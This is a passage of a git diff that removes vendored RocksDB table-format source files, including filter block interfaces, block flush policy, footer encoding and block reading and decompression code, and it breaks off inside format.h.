-  float time_per_op = (env->NowMicros() - start_time) * 1.0f / num;
-  fprintf(stderr,
-      "Time taken per op is %.3fus (%.1f Mqps) with batch size of %u\n",
-      time_per_op, 1.0 / time_per_op, batch_size);
-}
-}  // namespace.
-
-TEST_F(CuckooReaderTest, TestReadPerformance) {
-  if (!FLAGS_enable_perf) {
-    return;
-  }
-  double hash_ratio = 0.95;
-  // These numbers are chosen to have a hash utilization % close to
-  // 0.9, 0.75, 0.6 and 0.5 respectively.
-  // They all create 128 M buckets.
-  std::vector<uint64_t> nums = {120*1024*1024, 100*1024*1024, 80*1024*1024,
-    70*1024*1024};
-#ifndef NDEBUG
-  fprintf(stdout,
-      "WARNING: Not compiled with DNDEBUG. Performance tests may be slow.\n");
-#endif
-  for (uint64_t num : nums) {
-    if (FLAGS_write ||
-        Env::Default()->FileExists(GetFileName(num)).IsNotFound()) {
-      std::vector<std::string> all_keys;
-      GetKeys(num, &all_keys);
-      WriteFile(all_keys, num, hash_ratio);
-    }
-    ReadKeys(num, 0);
-    ReadKeys(num, 10);
-    ReadKeys(num, 25);
-    ReadKeys(num, 50);
-    ReadKeys(num, 100);
-    fprintf(stderr, "\n");
-  }
-}
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  if (rocksdb::port::kLittleEndian) {
-    ::testing::InitGoogleTest(&argc, argv);
-    ParseCommandLineFlags(&argc, &argv, true);
-    return RUN_ALL_TESTS();
-  }
-  else {
-    fprintf(stderr, "SKIPPED as Cuckoo table doesn't support Big Endian\n");
-    return 0;
-  }
-}
-
-#endif  // GFLAGS.
-
-#else
-#include <stdio.h>
-
-int main(int argc, char** argv) {
-  fprintf(stderr, "SKIPPED as Cuckoo table is not supported in ROCKSDB_LITE\n");
-  return 0;
-}
-
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/table/filter_block.h b/thirdparty/rocksdb/table/filter_block.h
deleted file mode 100644
index 7bf3b31..0000000
--- a/thirdparty/rocksdb/table/filter_block.h
+++ /dev/null
@@ -1,131 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2012 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-//
-// A filter block is stored near the end of a Table file.  It contains
-// filters (e.g., bloom filters) for all data blocks in the table combined
-// into a single filter block.
-//
-// It is a base class for BlockBasedFilter and FullFilter.
-// These two are both used in BlockBasedTable. The first one contain filter
-// For a part of keys in sst file, the second contain filter for all keys
-// in sst file.
-
-#pragma once
-
-#include <memory>
-#include <stddef.h>
-#include <stdint.h>
-#include <string>
-#include <vector>
-#include "rocksdb/options.h"
-#include "rocksdb/slice.h"
-#include "rocksdb/slice_transform.h"
-#include "rocksdb/table.h"
-#include "util/hash.h"
-#include "format.h"
-
-namespace rocksdb {
-
-const uint64_t kNotValid = ULLONG_MAX;
-class FilterPolicy;
-
-// A FilterBlockBuilder is used to construct all of the filters for a
-// particular Table.  It generates a single string which is stored as
-// a special block in the Table.
-//
-// The sequence of calls to FilterBlockBuilder must match the regexp:
-//      (StartBlock Add*)* Finish
-//
-// BlockBased/Full FilterBlock would be called in the same way.
-class FilterBlockBuilder {
- public:
-  explicit FilterBlockBuilder() {}
-  virtual ~FilterBlockBuilder() {}
-
-  virtual bool IsBlockBased() = 0;                    // If is blockbased filter
-  virtual void StartBlock(uint64_t block_offset) = 0;  // Start new block filter
-  virtual void Add(const Slice& key) = 0;      // Add a key to current filter
-  Slice Finish() {                             // Generate Filter
-    const BlockHandle empty_handle;
-    Status dont_care_status;
-    auto ret = Finish(empty_handle, &dont_care_status);
-    assert(dont_care_status.ok());
-    return ret;
-  }
-  virtual Slice Finish(const BlockHandle& tmp, Status* status) = 0;
-
- private:
-  // No copying allowed
-  FilterBlockBuilder(const FilterBlockBuilder&);
-  void operator=(const FilterBlockBuilder&);
-};
-
-// A FilterBlockReader is used to parse filter from SST table.
-// KeyMayMatch and PrefixMayMatch would trigger filter checking
-//
-// BlockBased/Full FilterBlock would be called in the same way.
-class FilterBlockReader {
- public:
-  explicit FilterBlockReader()
-      : whole_key_filtering_(true), size_(0), statistics_(nullptr) {}
-  explicit FilterBlockReader(size_t s, Statistics* stats,
-                             bool _whole_key_filtering)
-      : whole_key_filtering_(_whole_key_filtering),
-        size_(s),
-        statistics_(stats) {}
-  virtual ~FilterBlockReader() {}
-
-  virtual bool IsBlockBased() = 0;  // If is blockbased filter
-  /**
-   * If no_io is set, then it returns true if it cannot answer the query without
-   * reading data from disk. This is used in PartitionedFilterBlockReader to
-   * avoid reading partitions that are not in block cache already
-   *
-   * Normally filters are built on only the user keys and the InternalKey is not
-   * needed for a query. The index in PartitionedFilterBlockReader however is
-   * built upon InternalKey and must be provided via const_ikey_ptr when running
-   * queries.
-   */
-  virtual bool KeyMayMatch(const Slice& key, uint64_t block_offset = kNotValid,
-                           const bool no_io = false,
-                           const Slice* const const_ikey_ptr = nullptr) = 0;
-  /**
-   * no_io and const_ikey_ptr here means the same as in KeyMayMatch
-   */
-  virtual bool PrefixMayMatch(const Slice& prefix,
-                              uint64_t block_offset = kNotValid,
-                              const bool no_io = false,
-                              const Slice* const const_ikey_ptr = nullptr) = 0;
-  virtual size_t ApproximateMemoryUsage() const = 0;
-  virtual size_t size() const { return size_; }
-  virtual Statistics* statistics() const { return statistics_; }
-
-  bool whole_key_filtering() const { return whole_key_filtering_; }
-
-  // convert this object to a human readable form
-  virtual std::string ToString() const {
-    std::string error_msg("Unsupported filter \n");
-    return error_msg;
-  }
-
-  virtual void CacheDependencies(bool pin) {}
-
- protected:
-  bool whole_key_filtering_;
-
- private:
-  // No copying allowed
-  FilterBlockReader(const FilterBlockReader&);
-  void operator=(const FilterBlockReader&);
-  size_t size_;
-  Statistics* statistics_;
-  int level_ = -1;
-};
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/table/flush_block_policy.cc b/thirdparty/rocksdb/table/flush_block_policy.cc
deleted file mode 100644
index 9a8dea4..0000000
--- a/thirdparty/rocksdb/table/flush_block_policy.cc
+++ /dev/null
@@ -1,80 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include "rocksdb/options.h"
-#include "rocksdb/flush_block_policy.h"
-#include "rocksdb/slice.h"
-#include "table/block_builder.h"
-
-#include <cassert>
-
-namespace rocksdb {
-
-// Flush block by size
-class FlushBlockBySizePolicy : public FlushBlockPolicy {
- public:
-  // @params block_size:           Approximate size of user data packed per
-  //                               block.
-  // @params block_size_deviation: This is used to close a block before it
-  //                               reaches the configured
-  FlushBlockBySizePolicy(const uint64_t block_size,
-                         const uint64_t block_size_deviation,
-                         const BlockBuilder& data_block_builder)
-      : block_size_(block_size),
-        block_size_deviation_limit_(
-            ((block_size * (100 - block_size_deviation)) + 99) / 100),
-        data_block_builder_(data_block_builder) {}
-
-  virtual bool Update(const Slice& key,
-                      const Slice& value) override {
-    // it makes no sense to flush when the data block is empty
-    if (data_block_builder_.empty()) {
-      return false;
-    }
-
-    auto curr_size = data_block_builder_.CurrentSizeEstimate();
-
-    // Do flush if one of the below two conditions is true:
-    // 1) if the current estimated size already exceeds the block size,
-    // 2) block_size_deviation is set and the estimated size after appending
-    // the kv will exceed the block size and the current size is under the
-    // the deviation.
-    return curr_size >= block_size_ || BlockAlmostFull(key, value);
-  }
-
- private:
-  bool BlockAlmostFull(const Slice& key, const Slice& value) const {
-    if (block_size_deviation_limit_ == 0) {
-      return false;
-    }
-
-    const auto curr_size = data_block_builder_.CurrentSizeEstimate();
-    const auto estimated_size_after =
-      data_block_builder_.EstimateSizeAfterKV(key, value);
-
-    return estimated_size_after > block_size_ &&
-           curr_size > block_size_deviation_limit_;
-  }
-
-  const uint64_t block_size_;
-  const uint64_t block_size_deviation_limit_;
-  const BlockBuilder& data_block_builder_;
-};
-
-FlushBlockPolicy* FlushBlockBySizePolicyFactory::NewFlushBlockPolicy(
-    const BlockBasedTableOptions& table_options,
-    const BlockBuilder& data_block_builder) const {
-  return new FlushBlockBySizePolicy(
-      table_options.block_size, table_options.block_size_deviation,
-      data_block_builder);
-}
-
-FlushBlockPolicy* FlushBlockBySizePolicyFactory::NewFlushBlockPolicy(
-    const uint64_t size, const int deviation,
-    const BlockBuilder& data_block_builder) {
-  return new FlushBlockBySizePolicy(size, deviation, data_block_builder);
-}
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/table/format.cc b/thirdparty/rocksdb/table/format.cc
deleted file mode 100644
index 364766e..0000000
--- a/thirdparty/rocksdb/table/format.cc
+++ /dev/null
@@ -1,595 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include "table/format.h"
-
-#include <string>
-#include <inttypes.h>
-
-#include "monitoring/perf_context_imp.h"
-#include "monitoring/statistics.h"
-#include "rocksdb/env.h"
-#include "table/block.h"
-#include "table/block_based_table_reader.h"
-#include "table/persistent_cache_helper.h"
-#include "util/coding.h"
-#include "util/compression.h"
-#include "util/crc32c.h"
-#include "util/file_reader_writer.h"
-#include "util/logging.h"
-#include "util/stop_watch.h"
-#include "util/string_util.h"
-#include "util/xxhash.h"
-
-namespace rocksdb {
-
-extern const uint64_t kLegacyBlockBasedTableMagicNumber;
-extern const uint64_t kBlockBasedTableMagicNumber;
-
-#ifndef ROCKSDB_LITE
-extern const uint64_t kLegacyPlainTableMagicNumber;
-extern const uint64_t kPlainTableMagicNumber;
-#else
-// ROCKSDB_LITE doesn't have plain table
-const uint64_t kLegacyPlainTableMagicNumber = 0;
-const uint64_t kPlainTableMagicNumber = 0;
-#endif
-const uint32_t DefaultStackBufferSize = 5000;
-
-bool ShouldReportDetailedTime(Env* env, Statistics* stats) {
-  return env != nullptr && stats != nullptr &&
-         stats->stats_level_ > kExceptDetailedTimers;
-}
-
-void BlockHandle::EncodeTo(std::string* dst) const {
-  // Sanity check that all fields have been set
-  assert(offset_ != ~static_cast<uint64_t>(0));
-  assert(size_ != ~static_cast<uint64_t>(0));
-  PutVarint64Varint64(dst, offset_, size_);
-}
-
-Status BlockHandle::DecodeFrom(Slice* input) {
-  if (GetVarint64(input, &offset_) &&
-      GetVarint64(input, &size_)) {
-    return Status::OK();
-  } else {
-    // reset in case failure after partially decoding
-    offset_ = 0;
-    size_ = 0;
-    return Status::Corruption("bad block handle");
-  }
-}
-
-// Return a string that contains the copy of handle.
-std::string BlockHandle::ToString(bool hex) const {
-  std::string handle_str;
-  EncodeTo(&handle_str);
-  if (hex) {
-    return Slice(handle_str).ToString(true);
-  } else {
-    return handle_str;
-  }
-}
-
-const BlockHandle BlockHandle::kNullBlockHandle(0, 0);
-
-namespace {
-inline bool IsLegacyFooterFormat(uint64_t magic_number) {
-  return magic_number == kLegacyBlockBasedTableMagicNumber ||
-         magic_number == kLegacyPlainTableMagicNumber;
-}
-inline uint64_t UpconvertLegacyFooterFormat(uint64_t magic_number) {
-  if (magic_number == kLegacyBlockBasedTableMagicNumber) {
-    return kBlockBasedTableMagicNumber;
-  }
-  if (magic_number == kLegacyPlainTableMagicNumber) {
-    return kPlainTableMagicNumber;
-  }
-  assert(false);
-  return 0;
-}
-}  // namespace
-
-// legacy footer format:
-//    metaindex handle (varint64 offset, varint64 size)
-//    index handle     (varint64 offset, varint64 size)
-//    <padding> to make the total size 2 * BlockHandle::kMaxEncodedLength
-//    table_magic_number (8 bytes)
-// new footer format:
-//    checksum type (char, 1 byte)
-//    metaindex handle (varint64 offset, varint64 size)
-//    index handle     (varint64 offset, varint64 size)
-//    <padding> to make the total size 2 * BlockHandle::kMaxEncodedLength + 1
-//    footer version (4 bytes)
-//    table_magic_number (8 bytes)
-void Footer::EncodeTo(std::string* dst) const {
-  assert(HasInitializedTableMagicNumber());
-  if (IsLegacyFooterFormat(table_magic_number())) {
-    // has to be default checksum with legacy footer
-    assert(checksum_ == kCRC32c);
-    const size_t original_size = dst->size();
-    metaindex_handle_.EncodeTo(dst);
-    index_handle_.EncodeTo(dst);
-    dst->resize(original_size + 2 * BlockHandle::kMaxEncodedLength);  // Padding
-    PutFixed32(dst, static_cast<uint32_t>(table_magic_number() & 0xffffffffu));
-    PutFixed32(dst, static_cast<uint32_t>(table_magic_number() >> 32));
-    assert(dst->size() == original_size + kVersion0EncodedLength);
-  } else {
-    const size_t original_size = dst->size();
-    dst->push_back(static_cast<char>(checksum_));
-    metaindex_handle_.EncodeTo(dst);
-    index_handle_.EncodeTo(dst);
-    dst->resize(original_size + kNewVersionsEncodedLength - 12);  // Padding
-    PutFixed32(dst, version());
-    PutFixed32(dst, static_cast<uint32_t>(table_magic_number() & 0xffffffffu));
-    PutFixed32(dst, static_cast<uint32_t>(table_magic_number() >> 32));
-    assert(dst->size() == original_size + kNewVersionsEncodedLength);
-  }
-}
-
-Footer::Footer(uint64_t _table_magic_number, uint32_t _version)
-    : version_(_version),
-      checksum_(kCRC32c),
-      table_magic_number_(_table_magic_number) {
-  // This should be guaranteed by constructor callers
-  assert(!IsLegacyFooterFormat(_table_magic_number) || version_ == 0);
-}
-
-Status Footer::DecodeFrom(Slice* input) {
-  assert(!HasInitializedTableMagicNumber());
-  assert(input != nullptr);
-  assert(input->size() >= kMinEncodedLength);
-
-  const char *magic_ptr =
-      input->data() + input->size() - kMagicNumberLengthByte;
-  const uint32_t magic_lo = DecodeFixed32(magic_ptr);
-  const uint32_t magic_hi = DecodeFixed32(magic_ptr + 4);
-  uint64_t magic = ((static_cast<uint64_t>(magic_hi) << 32) |
-                    (static_cast<uint64_t>(magic_lo)));
-
-  // We check for legacy formats here and silently upconvert them
-  bool legacy = IsLegacyFooterFormat(magic);
-  if (legacy) {
-    magic = UpconvertLegacyFooterFormat(magic);
-  }
-  set_table_magic_number(magic);
-
-  if (legacy) {
-    // The size is already asserted to be at least kMinEncodedLength
-    // at the beginning of the function
-    input->remove_prefix(input->size() - kVersion0EncodedLength);
-    version_ = 0 /* legacy */;
-    checksum_ = kCRC32c;
-  } else {
-    version_ = DecodeFixed32(magic_ptr - 4);
-    // Footer version 1 and higher will always occupy exactly this many bytes.
-    // It consists of the checksum type, two block handles, padding,
-    // a version number, and a magic number
-    if (input->size() < kNewVersionsEncodedLength) {
-      return Status::Corruption("input is too short to be an sstable");
-    } else {
-      input->remove_prefix(input->size() - kNewVersionsEncodedLength);
-    }
-    uint32_t chksum;
-    if (!GetVarint32(input, &chksum)) {
-      return Status::Corruption("bad checksum type");
-    }
-    checksum_ = static_cast<ChecksumType>(chksum);
-  }
-
-  Status result = metaindex_handle_.DecodeFrom(input);
-  if (result.ok()) {
-    result = index_handle_.DecodeFrom(input);
-  }
-  if (result.ok()) {
-    // We skip over any leftover data (just padding for now) in "input"
-    const char* end = magic_ptr + kMagicNumberLengthByte;
-    *input = Slice(end, input->data() + input->size() - end);
-  }
-  return result;
-}
-
-std::string Footer::ToString() const {
-  std::string result, handle_;
-  result.reserve(1024);
-
-  bool legacy = IsLegacyFooterFormat(table_magic_number_);
-  if (legacy) {
-    result.append("metaindex handle: " + metaindex_handle_.ToString() + "\n  ");
-    result.append("index handle: " + index_handle_.ToString() + "\n  ");
-    result.append("table_magic_number: " +
-                  rocksdb::ToString(table_magic_number_) + "\n  ");
-  } else {
-    result.append("checksum: " + rocksdb::ToString(checksum_) + "\n  ");
-    result.append("metaindex handle: " + metaindex_handle_.ToString() + "\n  ");
-    result.append("index handle: " + index_handle_.ToString() + "\n  ");
-    result.append("footer version: " + rocksdb::ToString(version_) + "\n  ");
-    result.append("table_magic_number: " +
-                  rocksdb::ToString(table_magic_number_) + "\n  ");
-  }
-  return result;
-}
-
-Status ReadFooterFromFile(RandomAccessFileReader* file,
-                          FilePrefetchBuffer* prefetch_buffer,
-                          uint64_t file_size, Footer* footer,
-                          uint64_t enforce_table_magic_number) {
-  if (file_size < Footer::kMinEncodedLength) {
-    return Status::Corruption(
-      "file is too short (" + ToString(file_size) + " bytes) to be an "
-      "sstable: " + file->file_name());
-  }
-
-  char footer_space[Footer::kMaxEncodedLength];
-  Slice footer_input;
-  size_t read_offset =
-      (file_size > Footer::kMaxEncodedLength)
-          ? static_cast<size_t>(file_size - Footer::kMaxEncodedLength)
-          : 0;
-  Status s;
-  if (prefetch_buffer == nullptr ||
-      !prefetch_buffer->TryReadFromCache(read_offset, Footer::kMaxEncodedLength,
-                                         &footer_input)) {
-    s = file->Read(read_offset, Footer::kMaxEncodedLength, &footer_input,
-                   footer_space);
-    if (!s.ok()) return s;
-  }
-
-  // Check that we actually read the whole footer from the file. It may be
-  // that size isn't correct.
-  if (footer_input.size() < Footer::kMinEncodedLength) {
-    return Status::Corruption(
-      "file is too short (" + ToString(file_size) + " bytes) to be an "
-      "sstable" + file->file_name());
-  }
-
-  s = footer->DecodeFrom(&footer_input);
-  if (!s.ok()) {
-    return s;
-  }
-  if (enforce_table_magic_number != 0 &&
-      enforce_table_magic_number != footer->table_magic_number()) {
-    return Status::Corruption(
-      "Bad table magic number: expected "
-      + ToString(enforce_table_magic_number) + ", found "
-      + ToString(footer->table_magic_number())
-      + " in " + file->file_name());
-  }
-  return Status::OK();
-}
-
-// Without anonymous namespace here, we fail the warning -Wmissing-prototypes
-namespace {
-Status CheckBlockChecksum(const ReadOptions& options, const Footer& footer,
-                          const Slice& contents, size_t block_size,
-                          RandomAccessFileReader* file,
-                          const BlockHandle& handle) {
-  Status s;
-  // Check the crc of the type and the block contents
-  if (options.verify_checksums) {
-    const char* data = contents.data();  // Pointer to where Read put the data
-    PERF_TIMER_GUARD(block_checksum_time);
-    uint32_t value = DecodeFixed32(data + block_size + 1);
-    uint32_t actual = 0;
-    switch (footer.checksum()) {
-      case kNoChecksum:
-        break;
-      case kCRC32c:
-        value = crc32c::Unmask(value);
-        actual = crc32c::Value(data, block_size + 1);
-        break;
-      case kxxHash:
-        actual = XXH32(data, static_cast<int>(block_size) + 1, 0);
-        break;
-      default:
-        s = Status::Corruption(
-            "unknown checksum type " + ToString(footer.checksum()) + " in " +
-            file->file_name() + " offset " + ToString(handle.offset()) +
-            " size " + ToString(block_size));
-    }
-    if (s.ok() && actual != value) {
-      s = Status::Corruption(
-          "block checksum mismatch: expected " + ToString(actual) + ", got " +
-          ToString(value) + "  in " + file->file_name() + " offset " +
-          ToString(handle.offset()) + " size " + ToString(block_size));
-    }
-    if (!s.ok()) {
-      return s;
-    }
-  }
-  return s;
-}
-
-// Read a block and check its CRC
-// contents is the result of reading.
-// According to the implementation of file->Read, contents may not point to buf
-Status ReadBlock(RandomAccessFileReader* file, const Footer& footer,
-                 const ReadOptions& options, const BlockHandle& handle,
-                 Slice* contents, /* result of reading */ char* buf) {
-  size_t n = static_cast<size_t>(handle.size());
-  Status s;
-
-  {
-    PERF_TIMER_GUARD(block_read_time);
-    s = file->Read(handle.offset(), n + kBlockTrailerSize, contents, buf);
-  }
-
-  PERF_COUNTER_ADD(block_read_count, 1);
-  PERF_COUNTER_ADD(block_read_byte, n + kBlockTrailerSize);
-
-  if (!s.ok()) {
-    return s;
-  }
-  if (contents->size() != n + kBlockTrailerSize) {
-    return Status::Corruption("truncated block read from " + file->file_name() +
-                              " offset " + ToString(handle.offset()) +
-                              ", expected " + ToString(n + kBlockTrailerSize) +
-                              " bytes, got " + ToString(contents->size()));
-  }
-  return CheckBlockChecksum(options, footer, *contents, n, file, handle);
-}
-
-}  // namespace
-
-Status ReadBlockContents(RandomAccessFileReader* file,
-                         FilePrefetchBuffer* prefetch_buffer,
-                         const Footer& footer, const ReadOptions& read_options,
-                         const BlockHandle& handle, BlockContents* contents,
-                         const ImmutableCFOptions& ioptions,
-                         bool decompression_requested,
-                         const Slice& compression_dict,
-                         const PersistentCacheOptions& cache_options) {
-  Status status;
-  Slice slice;
-  size_t n = static_cast<size_t>(handle.size());
-  std::unique_ptr<char[]> heap_buf;
-  char stack_buf[DefaultStackBufferSize];
-  char* used_buf = nullptr;
-  rocksdb::CompressionType compression_type;
-
-  if (cache_options.persistent_cache &&
-      !cache_options.persistent_cache->IsCompressed()) {
-    status = PersistentCacheHelper::LookupUncompressedPage(cache_options,
-                                                           handle, contents);
-    if (status.ok()) {
-      // uncompressed page is found for the block handle
-      return status;
-    } else {
-      // uncompressed page is not found
-      if (ioptions.info_log && !status.IsNotFound()) {
-        assert(!status.ok());
-        ROCKS_LOG_INFO(ioptions.info_log,
-                       "Error reading from persistent cache. %s",
-                       status.ToString().c_str());
-      }
-    }
-  }
-
-  bool got_from_prefetch_buffer = false;
-  if (prefetch_buffer != nullptr &&
-      prefetch_buffer->TryReadFromCache(
-          handle.offset(),
-          static_cast<size_t>(handle.size()) + kBlockTrailerSize, &slice)) {
-    status =
-        CheckBlockChecksum(read_options, footer, slice,
-                           static_cast<size_t>(handle.size()), file, handle);
-    if (!status.ok()) {
-      return status;
-    }
-    got_from_prefetch_buffer = true;
-    used_buf = const_cast<char*>(slice.data());
-  } else if (cache_options.persistent_cache &&
-             cache_options.persistent_cache->IsCompressed()) {
-    // lookup uncompressed cache mode p-cache
-    status = PersistentCacheHelper::LookupRawPage(
-        cache_options, handle, &heap_buf, n + kBlockTrailerSize);
-  } else {
-    status = Status::NotFound();
-  }
-
-  if (!got_from_prefetch_buffer) {
-    if (status.ok()) {
-      // cache hit
-      used_buf = heap_buf.get();
-      slice = Slice(heap_buf.get(), n);
-    } else {
-      if (ioptions.info_log && !status.IsNotFound()) {
-        assert(!status.ok());
-        ROCKS_LOG_INFO(ioptions.info_log,
-                       "Error reading from persistent cache. %s",
-                       status.ToString().c_str());
-      }
-      // cache miss read from device
-      if (decompression_requested &&
-          n + kBlockTrailerSize < DefaultStackBufferSize) {
-        // If we've got a small enough hunk of data, read it in to the
-        // trivially allocated stack buffer instead of needing a full malloc()
-        used_buf = &stack_buf[0];
-      } else {
-        heap_buf = std::unique_ptr<char[]>(new char[n + kBlockTrailerSize]);
-        used_buf = heap_buf.get();
-      }
-
-      status = ReadBlock(file, footer, read_options, handle, &slice, used_buf);
-      if (status.ok() && read_options.fill_cache &&
-          cache_options.persistent_cache &&
-          cache_options.persistent_cache->IsCompressed()) {
-        // insert to raw cache
-        PersistentCacheHelper::InsertRawPage(cache_options, handle, used_buf,
-                                             n + kBlockTrailerSize);
-      }
-    }
-
-    if (!status.ok()) {
-      return status;
-    }
-  }
-
-  PERF_TIMER_GUARD(block_decompress_time);
-
-  compression_type = static_cast<rocksdb::CompressionType>(slice.data()[n]);
-
-  if (decompression_requested && compression_type != kNoCompression) {
-    // compressed page, uncompress, update cache
-    status = UncompressBlockContents(slice.data(), n, contents,
-                                     footer.version(), compression_dict,
-                                     ioptions);
-  } else if (slice.data() != used_buf) {
-    // the slice content is not the buffer provided
-    *contents = BlockContents(Slice(slice.data(), n), false, compression_type);
-  } else {
-    // page is uncompressed, the buffer either stack or heap provided
-    if (got_from_prefetch_buffer || used_buf == &stack_buf[0]) {
-      heap_buf = std::unique_ptr<char[]>(new char[n]);
-      memcpy(heap_buf.get(), used_buf, n);
-    }
-    *contents = BlockContents(std::move(heap_buf), n, true, compression_type);
-  }
-
-  if (status.ok() && !got_from_prefetch_buffer && read_options.fill_cache &&
-      cache_options.persistent_cache &&
-      !cache_options.persistent_cache->IsCompressed()) {
-    // insert to uncompressed cache
-    PersistentCacheHelper::InsertUncompressedPage(cache_options, handle,
-                                                  *contents);
-  }
-
-  return status;
-}
-
-Status UncompressBlockContentsForCompressionType(
-    const char* data, size_t n, BlockContents* contents,
-    uint32_t format_version, const Slice& compression_dict,
-    CompressionType compression_type, const ImmutableCFOptions &ioptions) {
-  std::unique_ptr<char[]> ubuf;
-
-  assert(compression_type != kNoCompression && "Invalid compression type");
-
-  StopWatchNano timer(ioptions.env,
-    ShouldReportDetailedTime(ioptions.env, ioptions.statistics));
-  int decompress_size = 0;
-  switch (compression_type) {
-    case kSnappyCompression: {
-      size_t ulength = 0;
-      static char snappy_corrupt_msg[] =
-        "Snappy not supported or corrupted Snappy compressed block contents";
-      if (!Snappy_GetUncompressedLength(data, n, &ulength)) {
-        return Status::Corruption(snappy_corrupt_msg);
-      }
-      ubuf.reset(new char[ulength]);
-      if (!Snappy_Uncompress(data, n, ubuf.get())) {
-        return Status::Corruption(snappy_corrupt_msg);
-      }
-      *contents = BlockContents(std::move(ubuf), ulength, true, kNoCompression);
-      break;
-    }
-    case kZlibCompression:
-      ubuf.reset(Zlib_Uncompress(
-          data, n, &decompress_size,
-          GetCompressFormatForVersion(kZlibCompression, format_version),
-          compression_dict));
-      if (!ubuf) {
-        static char zlib_corrupt_msg[] =
-          "Zlib not supported or corrupted Zlib compressed block contents";
-        return Status::Corruption(zlib_corrupt_msg);
-      }
-      *contents =
-          BlockContents(std::move(ubuf), decompress_size, true, kNoCompression);
-      break;
-    case kBZip2Compression:
-      ubuf.reset(BZip2_Uncompress(
-          data, n, &decompress_size,
-          GetCompressFormatForVersion(kBZip2Compression, format_version)));
-      if (!ubuf) {
-        static char bzip2_corrupt_msg[] =
-          "Bzip2 not supported or corrupted Bzip2 compressed block contents";
-        return Status::Corruption(bzip2_corrupt_msg);
-      }
-      *contents =
-          BlockContents(std::move(ubuf), decompress_size, true, kNoCompression);
-      break;
-    case kLZ4Compression:
-      ubuf.reset(LZ4_Uncompress(
-          data, n, &decompress_size,
-          GetCompressFormatForVersion(kLZ4Compression, format_version),
-          compression_dict));
-      if (!ubuf) {
-        static char lz4_corrupt_msg[] =
-          "LZ4 not supported or corrupted LZ4 compressed block contents";
-        return Status::Corruption(lz4_corrupt_msg);
-      }
-      *contents =
-          BlockContents(std::move(ubuf), decompress_size, true, kNoCompression);
-      break;
-    case kLZ4HCCompression:
-      ubuf.reset(LZ4_Uncompress(
-          data, n, &decompress_size,
-          GetCompressFormatForVersion(kLZ4HCCompression, format_version),
-          compression_dict));
-      if (!ubuf) {
-        static char lz4hc_corrupt_msg[] =
-          "LZ4HC not supported or corrupted LZ4HC compressed block contents";
-        return Status::Corruption(lz4hc_corrupt_msg);
-      }
-      *contents =
-          BlockContents(std::move(ubuf), decompress_size, true, kNoCompression);
-      break;
-    case kXpressCompression:
-      ubuf.reset(XPRESS_Uncompress(data, n, &decompress_size));
-      if (!ubuf) {
-        static char xpress_corrupt_msg[] =
-          "XPRESS not supported or corrupted XPRESS compressed block contents";
-        return Status::Corruption(xpress_corrupt_msg);
-      }
-      *contents =
-        BlockContents(std::move(ubuf), decompress_size, true, kNoCompression);
-      break;
-    case kZSTD:
-    case kZSTDNotFinalCompression:
-      ubuf.reset(ZSTD_Uncompress(data, n, &decompress_size, compression_dict));
-      if (!ubuf) {
-        static char zstd_corrupt_msg[] =
-            "ZSTD not supported or corrupted ZSTD compressed block contents";
-        return Status::Corruption(zstd_corrupt_msg);
-      }
-      *contents =
-          BlockContents(std::move(ubuf), decompress_size, true, kNoCompression);
-      break;
-    default:
-      return Status::Corruption("bad block type");
-  }
-
-  if(ShouldReportDetailedTime(ioptions.env, ioptions.statistics)){
-    MeasureTime(ioptions.statistics, DECOMPRESSION_TIMES_NANOS,
-      timer.ElapsedNanos());
-    MeasureTime(ioptions.statistics, BYTES_DECOMPRESSED, contents->data.size());
-    RecordTick(ioptions.statistics, NUMBER_BLOCK_DECOMPRESSED);
-  }
-
-  return Status::OK();
-}
-
-//
-// The 'data' points to the raw block contents that was read in from file.
-// This method allocates a new heap buffer and the raw block
-// contents are uncompresed into this buffer. This
-// buffer is returned via 'result' and it is upto the caller to
-// free this buffer.
-// format_version is the block format as defined in include/rocksdb/table.h
-Status UncompressBlockContents(const char* data, size_t n,
-                               BlockContents* contents, uint32_t format_version,
-                               const Slice& compression_dict,
-                               const ImmutableCFOptions &ioptions) {
-  assert(data[n] != kNoCompression);
-  return UncompressBlockContentsForCompressionType(
-      data, n, contents, format_version, compression_dict,
-      (CompressionType)data[n], ioptions);
-}
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/table/format.h b/thirdparty/rocksdb/table/format.h
deleted file mode 100644
index 512b4a3..0000000
--- a/thirdparty/rocksdb/table/format.h
+++ /dev/null
@@ -1,258 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#pragma once
-#include <string>
-#include <stdint.h>
-#include "rocksdb/slice.h"
-#include "rocksdb/status.h"
-#include "rocksdb/options.h"
-#include "rocksdb/table.h"
-
-#include "options/cf_options.h"
-#include "port/port.h"  // noexcept
-#include "table/persistent_cache_options.h"
-#include "util/file_reader_writer.h"
-
-namespace rocksdb {
-
-class Block;
-class RandomAccessFile;
-struct ReadOptions;
-
-extern bool ShouldReportDetailedTime(Env* env, Statistics* stats);
-
-// the length of the magic number in bytes.
-const int kMagicNumberLengthByte = 8;
-
-// BlockHandle is a pointer to the extent of a file that stores a data
-// block or a meta block.
-class BlockHandle {
